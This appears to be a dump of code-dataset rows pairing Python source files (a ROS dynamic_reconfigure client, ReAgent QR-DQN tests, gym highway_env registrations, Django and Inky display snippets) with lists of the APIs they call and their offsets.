code stringlengths 22 1.05M | apis listlengths 1 3.31k | extract_api stringlengths 75 3.25M |
|---|---|---|
# Software License Agreement (BSD License)
#
# Copyright (c) 2009, <NAME>, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of <NAME>, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
Python client API for dynamic_reconfigure (L{DynamicReconfigureClient}) as well as
example server implementation (L{DynamicReconfigureServer}).
"""
from __future__ import with_statement
try:
import roslib; roslib.load_manifest('dynamic_reconfigure')
except:
pass
import rospy
import rosservice
import sys
import threading
import time
import types
from dynamic_reconfigure import DynamicReconfigureParameterException
from dynamic_reconfigure.srv import Reconfigure as ReconfigureSrv
from dynamic_reconfigure.msg import Config as ConfigMsg
from dynamic_reconfigure.msg import ConfigDescription as ConfigDescrMsg
from dynamic_reconfigure.msg import IntParameter, BoolParameter, StrParameter, DoubleParameter, ParamDescription
from dynamic_reconfigure.encoding import *
class Client(object):
"""
Python dynamic_reconfigure client API
"""
def __init__(self, name, timeout=None, config_callback=None, description_callback=None):
"""
Connect to dynamic_reconfigure server and return a client object
@param name: name of the server to connect to (usually the node name)
@type name: str
@param timeout: time to wait before giving up
@type timeout: float
@param config_callback: callback for server parameter changes
@param description_callback: internal use only as the API has not stabilized
"""
self.name = name
self.config = None
self.param_description = None
self.group_description = None
self._param_types = None
self._cv = threading.Condition()
self._config_callback = config_callback
self._description_callback = description_callback
self._set_service = self._get_service_proxy('set_parameters', timeout)
self._descriptions_sub = self._get_subscriber('parameter_descriptions', ConfigDescrMsg, self._descriptions_msg)
self._updates_sub = self._get_subscriber('parameter_updates', ConfigMsg, self._updates_msg)
def get_configuration(self, timeout=None):
"""
Return the latest received server configuration (wait to receive
one if none have been received)
@param timeout: time to wait before giving up
@type timeout: float
@return: dictionary mapping parameter names to values or None if unable to retrieve config.
@rtype: {str: value}
"""
if timeout is None or timeout == 0.0:
if self.get_configuration(timeout=1.0) is None:
print >> sys.stderr, 'Waiting for configuration...'
with self._cv:
while self.config is None:
if rospy.is_shutdown():
return None
self._cv.wait()
else:
start_time = time.time()
with self._cv:
while self.config is None:
if rospy.is_shutdown():
return None
secs_left = timeout - (time.time() - start_time)
if secs_left <= 0.0:
break
self._cv.wait(secs_left)
return self.config
def get_parameter_descriptions(self, timeout=None):
"""
UNSTABLE. Return a description of the parameters for the server.
Do not use this method as the type that is returned may change.
@param timeout: time to wait before giving up
@type timeout: float
"""
if timeout is None or timeout == 0.0:
with self._cv:
while self.param_description is None:
if rospy.is_shutdown():
return None
self._cv.wait()
else:
start_time = time.time()
with self._cv:
while self.param_description is None:
if rospy.is_shutdown():
return None
secs_left = timeout - (time.time() - start_time)
if secs_left <= 0.0:
break
self._cv.wait(secs_left)
return self.param_description
def get_group_descriptions(self, timeout=None):
if timeout is None or timeout == 0.0:
with self._cv:
while self.group_description is None:
if rospy.is_shutdown():
return None
self._cv.wait()
else:
start_time = time.time()
with self._cv:
while self.group_description is None:
if rospy.is_shutdown():
return None
secs_left = timeout - (time.time() - start_time)
if secs_left <= 0.0:
break
self._cv.wait(secs_left)
return self.group_description
def update_configuration(self, changes):
"""
Change the server's configuration
@param changes: dictionary of key value pairs for the parameters that are changing
@type changes: {str: value}
"""
# Retrieve the parameter descriptions
if self.param_description is None:
self.get_parameter_descriptions()
# Cast the parameters to the appropriate types
if self.param_description is not None:
for name, value in list(changes.items())[:]:
if name != 'groups':
dest_type = self._param_types.get(name)
if dest_type is None:
raise DynamicReconfigureParameterException('don\'t know parameter: %s' % name)
try:
found = False
descr = [x for x in self.param_description if x['name'].lower() == name.lower()][0]
# Fix not converting bools properly
if dest_type is bool and type(value) is str:
changes[name] = value.lower() in ("yes", "true", "t", "1")
found = True
# Handle enums
elif type(value) is str and not descr['edit_method'] == '':
enum_descr = eval(descr['edit_method'])
found = False
for const in enum_descr['enum']:
if value.lower() == const['name'].lower():
val_type = self._param_type_from_string(const['type'])
changes[name] = val_type(const['value'])
found = True
if not found:
if sys.version_info.major < 3:
if type(value) is unicode:
changes[name] = unicode(value)
else:
changes[name] = dest_type(value)
else:
changes[name] = dest_type(value)
except ValueError as e:
raise DynamicReconfigureParameterException('can\'t set parameter \'%s\' of %s: %s' % (name, str(dest_type), e))
if 'groups' in changes.keys():
changes['groups'] = self.update_groups(changes['groups'])
config = encode_config(changes)
msg = self._set_service(config).config
if self.group_description is None:
self.get_group_descriptions()
resp = decode_config(msg, self.group_description)
return resp
def update_groups(self, changes):
"""
Changes the servers group configuration
@param changes: dictionary of key value pairs for the parameters that are changing
@type changes: {str: value}
"""
descr = self.get_group_descriptions()
groups = []
def update_state(group, description):
for p,g in description['groups'].items():
if g['name'] == group:
description['groups'][p]['state'] = changes[group]
else:
update_state(group, g)
return description
for change in changes:
descr = update_state(change, descr)
return descr
def close(self):
"""
Close connections to the server
"""
self._descriptions_sub.unregister()
self._updates_sub.unregister()
## config_callback
def get_config_callback(self):
"""
Retrieve the config_callback
"""
return self._config_callback
def set_config_callback(self, value):
"""
Set the config_callback
"""
self._config_callback = value
if self._config_callback is not None:
self._config_callback(self.config)
config_callback = property(get_config_callback, set_config_callback)
## description_callback
def get_description_callback(self):
"""
Get the current description_callback
"""
return self._description_callback
def set_description_callback(self, value):
"""
UNSTABLE. Set the description callback. Do not use as the type of the
description callback may change.
"""
self._description_callback = value
if self._description_callback is not None:
self._description_callback(self.param_description)
description_callback = property(get_description_callback, set_description_callback)
# Implementation
def _get_service_proxy(self, suffix, timeout):
service_name = rospy.resolve_name(self.name + '/' + suffix)
if timeout is None or timeout == 0.0:
try:
rospy.wait_for_service(service_name, 1.0)
except rospy.exceptions.ROSException:
print >> sys.stderr, 'Waiting for service %s...' % service_name
rospy.wait_for_service(service_name, timeout)
else:
rospy.wait_for_service(service_name, timeout)
return rospy.ServiceProxy(service_name, ReconfigureSrv)
def _get_subscriber(self, suffix, type, callback):
topic_name = rospy.resolve_name(self.name + '/' + suffix)
return rospy.Subscriber(topic_name, type, callback=callback)
def _updates_msg(self, msg):
if self.group_description is None:
self.get_group_descriptions()
self.config = decode_config(msg, self.group_description)
with self._cv:
self._cv.notifyAll()
if self._config_callback is not None:
self._config_callback(self.config)
def _descriptions_msg(self, msg):
self.group_description = decode_description(msg)
self.param_description = extract_params(self.group_description)
# Build map from parameter name to type
self._param_types = {}
for p in self.param_description:
n, t = p.get('name'), p.get('type')
if n is not None and t is not None:
self._param_types[n] = self._param_type_from_string(t)
with self._cv:
self._cv.notifyAll()
if self._description_callback is not None:
self._description_callback(self.param_description)
def _param_type_from_string(self, type_str):
if type_str == 'int': return int
elif type_str == 'double': return float
elif type_str == 'str': return str
elif type_str == 'bool': return bool
else:
raise DynamicReconfigureParameterException('parameter has unknown type: %s. This is a bug in dynamic_reconfigure.' % type_str)
| [
"rospy.resolve_name",
"dynamic_reconfigure.DynamicReconfigureParameterException",
"rospy.is_shutdown",
"rospy.ServiceProxy",
"roslib.load_manifest",
"threading.Condition",
"rospy.Subscriber",
"time.time",
"rospy.wait_for_service"
] | [((1808, 1851), 'roslib.load_manifest', 'roslib.load_manifest', (['"""dynamic_reconfigure"""'], {}), "('dynamic_reconfigure')\n", (1828, 1851), False, 'import roslib\n'), ((3226, 3247), 'threading.Condition', 'threading.Condition', ([], {}), '()\n', (3245, 3247), False, 'import threading\n'), ((11493, 11537), 'rospy.resolve_name', 'rospy.resolve_name', (["(self.name + '/' + suffix)"], {}), "(self.name + '/' + suffix)\n", (11511, 11537), False, 'import rospy\n'), ((11939, 11987), 'rospy.ServiceProxy', 'rospy.ServiceProxy', (['service_name', 'ReconfigureSrv'], {}), '(service_name, ReconfigureSrv)\n', (11957, 11987), False, 'import rospy\n'), ((12065, 12109), 'rospy.resolve_name', 'rospy.resolve_name', (["(self.name + '/' + suffix)"], {}), "(self.name + '/' + suffix)\n", (12083, 12109), False, 'import rospy\n'), ((12134, 12187), 'rospy.Subscriber', 'rospy.Subscriber', (['topic_name', 'type'], {'callback': 'callback'}), '(topic_name, type, callback=callback)\n', (12150, 12187), False, 'import rospy\n'), ((4522, 4533), 'time.time', 'time.time', ([], {}), '()\n', (4531, 4533), False, 'import time\n'), ((5498, 5509), 'time.time', 'time.time', ([], {}), '()\n', (5507, 5509), False, 'import time\n'), ((6230, 6241), 'time.time', 'time.time', ([], {}), '()\n', (6239, 6241), False, 'import time\n'), ((11877, 11922), 'rospy.wait_for_service', 'rospy.wait_for_service', (['service_name', 'timeout'], {}), '(service_name, timeout)\n', (11899, 11922), False, 'import rospy\n'), ((11617, 11658), 'rospy.wait_for_service', 'rospy.wait_for_service', (['service_name', '(1.0)'], {}), '(service_name, 1.0)\n', (11639, 11658), False, 'import rospy\n'), ((4627, 4646), 'rospy.is_shutdown', 'rospy.is_shutdown', ([], {}), '()\n', (4644, 4646), False, 'import rospy\n'), ((5366, 5385), 'rospy.is_shutdown', 'rospy.is_shutdown', ([], {}), '()\n', (5383, 5385), False, 'import rospy\n'), ((5614, 5633), 'rospy.is_shutdown', 'rospy.is_shutdown', ([], {}), '()\n', (5631, 5633), False, 'import rospy\n'), ((6098, 6117), 'rospy.is_shutdown', 'rospy.is_shutdown', ([], {}), '()\n', (6115, 6117), False, 'import rospy\n'), ((6346, 6365), 'rospy.is_shutdown', 'rospy.is_shutdown', ([], {}), '()\n', (6363, 6365), False, 'import rospy\n'), ((11805, 11850), 'rospy.wait_for_service', 'rospy.wait_for_service', (['service_name', 'timeout'], {}), '(service_name, timeout)\n', (11827, 11850), False, 'import rospy\n'), ((4382, 4401), 'rospy.is_shutdown', 'rospy.is_shutdown', ([], {}), '()\n', (4399, 4401), False, 'import rospy\n'), ((7332, 7403), 'dynamic_reconfigure.DynamicReconfigureParameterException', 'DynamicReconfigureParameterException', (['("don\'t know parameter: %s" % name)'], {}), '("don\'t know parameter: %s" % name)\n', (7368, 7403), False, 'from dynamic_reconfigure import DynamicReconfigureParameterException\n'), ((13426, 13555), 'dynamic_reconfigure.DynamicReconfigureParameterException', 'DynamicReconfigureParameterException', (["('parameter has unknown type: %s. This is a bug in dynamic_reconfigure.' %\n type_str)"], {}), "(\n 'parameter has unknown type: %s. This is a bug in dynamic_reconfigure.' %\n type_str)\n", (13462, 13555), False, 'from dynamic_reconfigure import DynamicReconfigureParameterException\n'), ((4727, 4738), 'time.time', 'time.time', ([], {}), '()\n', (4736, 4738), False, 'import time\n'), ((5714, 5725), 'time.time', 'time.time', ([], {}), '()\n', (5723, 5725), False, 'import time\n'), ((6446, 6457), 'time.time', 'time.time', ([], {}), '()\n', (6455, 6457), False, 'import time\n')] |
from random import Random
from rstr import Rstr
from . import Generator
class Regex(Generator):
def __init__(self, regex, seed=None):
self.gen = Rstr(Random(seed))
self.regex = regex
def get_single(self):
return self.gen.xeger(self.regex)
| [
"random.Random"
] | [((163, 175), 'random.Random', 'Random', (['seed'], {}), '(seed)\n', (169, 175), False, 'from random import Random\n')] |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
import unittest
import torch
from reagent.core.parameters import EvaluationParameters, RLParameters
from reagent.core.types import FeatureData, DiscreteDqnInput, ExtraData
from reagent.evaluation.evaluator import get_metrics_to_score
from reagent.models.dqn import FullyConnectedDQN
from reagent.training.parameters import QRDQNTrainerParameters
from reagent.training.qrdqn_trainer import QRDQNTrainer
from reagent.workflow.types import RewardOptions
class TestQRDQN(unittest.TestCase):
def setUp(self):
# preparing various components for qr-dqn trainer initialization
self.params = QRDQNTrainerParameters(actions=["1", "2"], num_atoms=11)
self.reward_options = RewardOptions()
self.metrics_to_score = get_metrics_to_score(
self.reward_options.metric_reward_values
)
self.state_dim = 10
self.action_dim = 2
self.sizes = [20, 20]
self.num_atoms = 11
self.activations = ["relu", "relu"]
self.dropout_ratio = 0
self.q_network = FullyConnectedDQN(
state_dim=self.state_dim,
action_dim=self.action_dim,
sizes=self.sizes,
num_atoms=self.num_atoms,
activations=self.activations,
dropout_ratio=self.dropout_ratio,
)
self.q_network_target = self.q_network.get_target_network()
self.x = FeatureData(float_features=torch.rand(5, 10))
self.eval_parameters = EvaluationParameters(calc_cpe_in_training=True)
self.num_output_nodes = (len(self.metrics_to_score) + 1) * len(
# pyre-fixme[16]: `QRDQNTrainerParameters` has no attribute `actions`.
self.params.actions
)
self.reward_network = FullyConnectedDQN(
state_dim=self.state_dim,
action_dim=self.num_output_nodes,
sizes=self.sizes,
activations=self.activations,
)
self.q_network_cpe = FullyConnectedDQN(
state_dim=self.state_dim,
action_dim=self.num_output_nodes,
sizes=self.sizes,
activations=self.activations,
)
self.q_network_cpe_target = self.q_network_cpe.get_target_network()
def _construct_trainer(self, new_params=None, no_cpe=False):
reward_network = self.reward_network
q_network_cpe = self.q_network_cpe
q_network_cpe_target = self.q_network_cpe_target
evaluation = self.eval_parameters
params = self.params
if new_params is not None:
params = new_params
if no_cpe:
reward_network = q_network_cpe = q_network_cpe_target = None
evaluation = EvaluationParameters(calc_cpe_in_training=False)
return QRDQNTrainer(
q_network=self.q_network,
q_network_target=self.q_network_target,
reward_network=reward_network,
q_network_cpe=q_network_cpe,
q_network_cpe_target=q_network_cpe_target,
metrics_to_score=self.metrics_to_score,
evaluation=evaluation,
# pyre-fixme[16]: `QRDQNTrainerParameters` has no attribute `asdict`.
**params.asdict()
)
def test_init(self):
trainer = self._construct_trainer()
quantiles = (0.5 + torch.arange(self.num_atoms).float()) / float(self.num_atoms)
self.assertTrue((torch.isclose(trainer.quantiles, quantiles)).all())
self.assertTrue((torch.isclose(trainer.reward_boosts, torch.zeros(2))).all())
param_copy = QRDQNTrainerParameters(
actions=["1", "2"],
num_atoms=11,
rl=RLParameters(reward_boost={"1": 1, "2": 2}),
)
reward_boost_trainer = self._construct_trainer(new_params=param_copy)
self.assertTrue(
(
torch.isclose(
reward_boost_trainer.reward_boosts, torch.tensor([1.0, 2.0])
)
).all()
)
def test_train_step_gen(self):
inp = DiscreteDqnInput(
state=FeatureData(float_features=torch.rand(3, 10)),
next_state=FeatureData(float_features=torch.rand(3, 10)),
reward=torch.ones(3, 1),
time_diff=torch.ones(3, 1) * 2,
step=torch.ones(3, 1) * 2,
not_terminal=torch.ones(3, 1), # todo: check terminal behavior
action=torch.tensor([[0, 1], [1, 0], [0, 1]]),
next_action=torch.tensor([[1, 0], [0, 1], [1, 0]]),
possible_actions_mask=torch.ones(3, 2),
possible_next_actions_mask=torch.ones(3, 2),
extras=ExtraData(),
)
mse_backward_type = type(
torch.nn.functional.mse_loss(
torch.tensor([1.0], requires_grad=True), torch.zeros(1)
).grad_fn
)
add_backward_type = type(
(
torch.tensor([1.0], requires_grad=True)
+ torch.tensor([1.0], requires_grad=True)
).grad_fn
)
mean_backward_type = type(
torch.tensor([1.0, 2.0], requires_grad=True).mean().grad_fn
)
# vanilla
trainer = self._construct_trainer()
loss_gen = trainer.train_step_gen(inp, batch_idx=1)
losses = list(loss_gen)
self.assertEqual(len(losses), 4)
self.assertEqual(type(losses[0].grad_fn), mean_backward_type)
self.assertEqual(type(losses[1].grad_fn), mse_backward_type)
self.assertEqual(type(losses[2].grad_fn), mse_backward_type)
self.assertEqual(type(losses[3].grad_fn), add_backward_type)
# no CPE
trainer = self._construct_trainer(no_cpe=True)
loss_gen = trainer.train_step_gen(inp, batch_idx=1)
losses = list(loss_gen)
self.assertEqual(len(losses), 2)
# seq_num
param_copy = QRDQNTrainerParameters(
actions=["1", "2"],
num_atoms=11,
rl=RLParameters(use_seq_num_diff_as_time_diff=True),
)
trainer = self._construct_trainer(new_params=param_copy)
loss_gen = trainer.train_step_gen(inp, batch_idx=1)
losses = list(loss_gen)
self.assertEqual(len(losses), 4)
# multi_steps
param_copy = QRDQNTrainerParameters(
actions=["1", "2"], num_atoms=11, rl=RLParameters(multi_steps=2)
)
trainer = self._construct_trainer(new_params=param_copy)
loss_gen = trainer.train_step_gen(inp, batch_idx=1)
losses = list(loss_gen)
self.assertEqual(len(losses), 4)
# non_max_q
param_copy = QRDQNTrainerParameters(
actions=["1", "2"], num_atoms=11, rl=RLParameters(maxq_learning=False)
)
trainer = self._construct_trainer(new_params=param_copy)
loss_gen = trainer.train_step_gen(inp, batch_idx=1)
losses = list(loss_gen)
self.assertEqual(len(losses), 4)
def test_configure_optimizers(self):
trainer = self._construct_trainer()
optimizers = trainer.configure_optimizers()
self.assertEqual(len(optimizers), 4)
train_step_yield_order = [
trainer.q_network,
trainer.reward_network,
trainer.q_network_cpe,
trainer.q_network,
]
for i in range(len(train_step_yield_order)):
opt_param = optimizers[i]["optimizer"].param_groups[0]["params"][0]
loss_param = list(train_step_yield_order[i].parameters())[0]
self.assertTrue(torch.all(torch.isclose(opt_param, loss_param)))
trainer = self._construct_trainer(no_cpe=True)
optimizers = trainer.configure_optimizers()
self.assertEqual(len(optimizers), 2)
def test_get_detached_model_outputs(self):
trainer = self._construct_trainer()
q_out, q_target = trainer.get_detached_model_outputs(self.x)
self.assertEqual(q_out.shape[0], q_target.shape[0], 3)
self.assertEqual(q_out.shape[1], q_target.shape[1], 2)
| [
"reagent.training.parameters.QRDQNTrainerParameters",
"reagent.core.types.ExtraData",
"reagent.core.parameters.RLParameters",
"torch.isclose",
"reagent.evaluation.evaluator.get_metrics_to_score",
"torch.tensor",
"torch.arange",
"reagent.core.parameters.EvaluationParameters",
"reagent.models.dqn.Full... | [((702, 758), 'reagent.training.parameters.QRDQNTrainerParameters', 'QRDQNTrainerParameters', ([], {'actions': "['1', '2']", 'num_atoms': '(11)'}), "(actions=['1', '2'], num_atoms=11)\n", (724, 758), False, 'from reagent.training.parameters import QRDQNTrainerParameters\n'), ((789, 804), 'reagent.workflow.types.RewardOptions', 'RewardOptions', ([], {}), '()\n', (802, 804), False, 'from reagent.workflow.types import RewardOptions\n'), ((837, 899), 'reagent.evaluation.evaluator.get_metrics_to_score', 'get_metrics_to_score', (['self.reward_options.metric_reward_values'], {}), '(self.reward_options.metric_reward_values)\n', (857, 899), False, 'from reagent.evaluation.evaluator import get_metrics_to_score\n'), ((1136, 1324), 'reagent.models.dqn.FullyConnectedDQN', 'FullyConnectedDQN', ([], {'state_dim': 'self.state_dim', 'action_dim': 'self.action_dim', 'sizes': 'self.sizes', 'num_atoms': 'self.num_atoms', 'activations': 'self.activations', 'dropout_ratio': 'self.dropout_ratio'}), '(state_dim=self.state_dim, action_dim=self.action_dim,\n sizes=self.sizes, num_atoms=self.num_atoms, activations=self.\n activations, dropout_ratio=self.dropout_ratio)\n', (1153, 1324), False, 'from reagent.models.dqn import FullyConnectedDQN\n'), ((1561, 1608), 'reagent.core.parameters.EvaluationParameters', 'EvaluationParameters', ([], {'calc_cpe_in_training': '(True)'}), '(calc_cpe_in_training=True)\n', (1581, 1608), False, 'from reagent.core.parameters import EvaluationParameters, RLParameters\n'), ((1836, 1966), 'reagent.models.dqn.FullyConnectedDQN', 'FullyConnectedDQN', ([], {'state_dim': 'self.state_dim', 'action_dim': 'self.num_output_nodes', 'sizes': 'self.sizes', 'activations': 'self.activations'}), '(state_dim=self.state_dim, action_dim=self.\n num_output_nodes, sizes=self.sizes, activations=self.activations)\n', (1853, 1966), False, 'from reagent.models.dqn import FullyConnectedDQN\n'), ((2050, 2180), 'reagent.models.dqn.FullyConnectedDQN', 'FullyConnectedDQN', ([], {'state_dim': 'self.state_dim', 'action_dim': 'self.num_output_nodes', 'sizes': 'self.sizes', 'activations': 'self.activations'}), '(state_dim=self.state_dim, action_dim=self.\n num_output_nodes, sizes=self.sizes, activations=self.activations)\n', (2067, 2180), False, 'from reagent.models.dqn import FullyConnectedDQN\n'), ((2778, 2826), 'reagent.core.parameters.EvaluationParameters', 'EvaluationParameters', ([], {'calc_cpe_in_training': '(False)'}), '(calc_cpe_in_training=False)\n', (2798, 2826), False, 'from reagent.core.parameters import EvaluationParameters, RLParameters\n'), ((1511, 1528), 'torch.rand', 'torch.rand', (['(5)', '(10)'], {}), '(5, 10)\n', (1521, 1528), False, 'import torch\n'), ((3735, 3778), 'reagent.core.parameters.RLParameters', 'RLParameters', ([], {'reward_boost': "{'1': 1, '2': 2}"}), "(reward_boost={'1': 1, '2': 2})\n", (3747, 3778), False, 'from reagent.core.parameters import EvaluationParameters, RLParameters\n'), ((4289, 4305), 'torch.ones', 'torch.ones', (['(3)', '(1)'], {}), '(3, 1)\n', (4299, 4305), False, 'import torch\n'), ((4415, 4431), 'torch.ones', 'torch.ones', (['(3)', '(1)'], {}), '(3, 1)\n', (4425, 4431), False, 'import torch\n'), ((4485, 4523), 'torch.tensor', 'torch.tensor', (['[[0, 1], [1, 0], [0, 1]]'], {}), '([[0, 1], [1, 0], [0, 1]])\n', (4497, 4523), False, 'import torch\n'), ((4549, 4587), 'torch.tensor', 'torch.tensor', (['[[1, 0], [0, 1], [1, 0]]'], {}), '([[1, 0], [0, 1], [1, 0]])\n', (4561, 4587), False, 'import torch\n'), ((4623, 4639), 'torch.ones', 'torch.ones', (['(3)', '(2)'], {}), '(3, 2)\n', (4633, 4639), False, 'import torch\n'), ((4680, 4696), 'torch.ones', 'torch.ones', (['(3)', '(2)'], {}), '(3, 2)\n', (4690, 4696), False, 'import torch\n'), ((4717, 4728), 'reagent.core.types.ExtraData', 'ExtraData', ([], {}), '()\n', (4726, 4728), False, 'from reagent.core.types import FeatureData, DiscreteDqnInput, ExtraData\n'), ((6047, 6095), 'reagent.core.parameters.RLParameters', 'RLParameters', ([], {'use_seq_num_diff_as_time_diff': '(True)'}), '(use_seq_num_diff_as_time_diff=True)\n', (6059, 6095), False, 'from reagent.core.parameters import EvaluationParameters, RLParameters\n'), ((6422, 6449), 'reagent.core.parameters.RLParameters', 'RLParameters', ([], {'multi_steps': '(2)'}), '(multi_steps=2)\n', (6434, 6449), False, 'from reagent.core.parameters import EvaluationParameters, RLParameters\n'), ((6773, 6806), 'reagent.core.parameters.RLParameters', 'RLParameters', ([], {'maxq_learning': '(False)'}), '(maxq_learning=False)\n', (6785, 6806), False, 'from reagent.core.parameters import EvaluationParameters, RLParameters\n'), ((3479, 3522), 'torch.isclose', 'torch.isclose', (['trainer.quantiles', 'quantiles'], {}), '(trainer.quantiles, quantiles)\n', (3492, 3522), False, 'import torch\n'), ((4329, 4345), 'torch.ones', 'torch.ones', (['(3)', '(1)'], {}), '(3, 1)\n', (4339, 4345), False, 'import torch\n'), ((4368, 4384), 'torch.ones', 'torch.ones', (['(3)', '(1)'], {}), '(3, 1)\n', (4378, 4384), False, 'import torch\n'), ((4832, 4871), 'torch.tensor', 'torch.tensor', (['[1.0]'], {'requires_grad': '(True)'}), '([1.0], requires_grad=True)\n', (4844, 4871), False, 'import torch\n'), ((4873, 4887), 'torch.zeros', 'torch.zeros', (['(1)'], {}), '(1)\n', (4884, 4887), False, 'import torch\n'), ((4984, 5023), 'torch.tensor', 'torch.tensor', (['[1.0]'], {'requires_grad': '(True)'}), '([1.0], requires_grad=True)\n', (4996, 5023), False, 'import torch\n'), ((5042, 5081), 'torch.tensor', 'torch.tensor', (['[1.0]'], {'requires_grad': '(True)'}), '([1.0], requires_grad=True)\n', (5054, 5081), False, 'import torch\n'), ((7620, 7656), 'torch.isclose', 'torch.isclose', (['opt_param', 'loss_param'], {}), '(opt_param, loss_param)\n', (7633, 7656), False, 'import torch\n'), ((3392, 3420), 'torch.arange', 'torch.arange', (['self.num_atoms'], {}), '(self.num_atoms)\n', (3404, 3420), False, 'import torch\n'), ((3593, 3607), 'torch.zeros', 'torch.zeros', (['(2)'], {}), '(2)\n', (3604, 3607), False, 'import torch\n'), ((3994, 4018), 'torch.tensor', 'torch.tensor', (['[1.0, 2.0]'], {}), '([1.0, 2.0])\n', (4006, 4018), False, 'import torch\n'), ((4180, 4197), 'torch.rand', 'torch.rand', (['(3)', '(10)'], {}), '(3, 10)\n', (4190, 4197), False, 'import torch\n'), ((4250, 4267), 'torch.rand', 'torch.rand', (['(3)', '(10)'], {}), '(3, 10)\n', (4260, 4267), False, 'import torch\n'), ((5161, 5205), 'torch.tensor', 'torch.tensor', (['[1.0, 2.0]'], {'requires_grad': '(True)'}), '([1.0, 2.0], requires_grad=True)\n', (5173, 5205), False, 'import torch\n')] |
from gym.envs.registration import register
register(
id='highway-v0',
entry_point='highway_env.envs:HighwayEnv',
)
register(
id='highway-continuous-v0',
entry_point='highway_env.envs:HighwayEnvCon',
)
register(
id='highway-continuous-intrinsic-rew-v0',
entry_point='highway_env.envs:HighwayEnvCon_intrinsic_rew',
)
register(
id='merge-v0',
entry_point='highway_env.envs:MergeEnv',
)
register(
id='roundabout-v0',
entry_point='highway_env.envs:RoundaboutEnv',
)
register(
id='two-way-v0',
entry_point='highway_env.envs:TwoWayEnv',
max_episode_steps=15
)
register(
id='parking-v0',
entry_point='highway_env.envs:ParkingEnv',
max_episode_steps=20
)
| [
"gym.envs.registration.register"
] | [((44, 112), 'gym.envs.registration.register', 'register', ([], {'id': '"""highway-v0"""', 'entry_point': '"""highway_env.envs:HighwayEnv"""'}), "(id='highway-v0', entry_point='highway_env.envs:HighwayEnv')\n", (52, 112), False, 'from gym.envs.registration import register\n'), ((125, 212), 'gym.envs.registration.register', 'register', ([], {'id': '"""highway-continuous-v0"""', 'entry_point': '"""highway_env.envs:HighwayEnvCon"""'}), "(id='highway-continuous-v0', entry_point=\n 'highway_env.envs:HighwayEnvCon')\n", (133, 212), False, 'from gym.envs.registration import register\n'), ((220, 335), 'gym.envs.registration.register', 'register', ([], {'id': '"""highway-continuous-intrinsic-rew-v0"""', 'entry_point': '"""highway_env.envs:HighwayEnvCon_intrinsic_rew"""'}), "(id='highway-continuous-intrinsic-rew-v0', entry_point=\n 'highway_env.envs:HighwayEnvCon_intrinsic_rew')\n", (228, 335), False, 'from gym.envs.registration import register\n'), ((343, 407), 'gym.envs.registration.register', 'register', ([], {'id': '"""merge-v0"""', 'entry_point': '"""highway_env.envs:MergeEnv"""'}), "(id='merge-v0', entry_point='highway_env.envs:MergeEnv')\n", (351, 407), False, 'from gym.envs.registration import register\n'), ((420, 494), 'gym.envs.registration.register', 'register', ([], {'id': '"""roundabout-v0"""', 'entry_point': '"""highway_env.envs:RoundaboutEnv"""'}), "(id='roundabout-v0', entry_point='highway_env.envs:RoundaboutEnv')\n", (428, 494), False, 'from gym.envs.registration import register\n'), ((507, 600), 'gym.envs.registration.register', 'register', ([], {'id': '"""two-way-v0"""', 'entry_point': '"""highway_env.envs:TwoWayEnv"""', 'max_episode_steps': '(15)'}), "(id='two-way-v0', entry_point='highway_env.envs:TwoWayEnv',\n max_episode_steps=15)\n", (515, 600), False, 'from gym.envs.registration import register\n'), ((612, 706), 'gym.envs.registration.register', 'register', ([], {'id': '"""parking-v0"""', 'entry_point': '"""highway_env.envs:ParkingEnv"""', 'max_episode_steps': '(20)'}), "(id='parking-v0', entry_point='highway_env.envs:ParkingEnv',\n max_episode_steps=20)\n", (620, 706), False, 'from gym.envs.registration import register\n')] |
# -*- encoding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from django.conf.urls import patterns, include, url
from django_powerdns_api.routers import router
urlpatterns = patterns(
'',
url(r'^', include(router.urls)),
)
| [
"django.conf.urls.include"
] | [((325, 345), 'django.conf.urls.include', 'include', (['router.urls'], {}), '(router.urls)\n', (332, 345), False, 'from django.conf.urls import patterns, include, url\n')] |
#!/usr/bin/env python
import argparse
from PIL import Image
from inky import InkyPHAT
print("""Inky pHAT/wHAT: Logo
Displays the Inky pHAT/wHAT logo.
""")
type = "phat"
colour = "black"
inky_display = InkyPHAT(colour)
inky_display.set_border(inky_display.BLACK)
img = Image.open("assets/InkypHAT-212x104-bw.png")
inky_display.set_image(img)
inky_display.show() | [
"inky.InkyPHAT",
"PIL.Image.open"
] | [((205, 221), 'inky.InkyPHAT', 'InkyPHAT', (['colour'], {}), '(colour)\n', (213, 221), False, 'from inky import InkyPHAT\n'), ((273, 317), 'PIL.Image.open', 'Image.open', (['"""assets/InkypHAT-212x104-bw.png"""'], {}), "('assets/InkypHAT-212x104-bw.png')\n", (283, 317), False, 'from PIL import Image\n')] |
from django.test import TestCase
from .models import *
from django.contrib.auth.models import User
# Create your tests here.
user = User.objects.get(id=1)
profile = Profile.objects.get(id=1)
neighbourhood = Neighbourhood.objects.get(id=1)
class TestBusiness(TestCase):
def setUp(self):
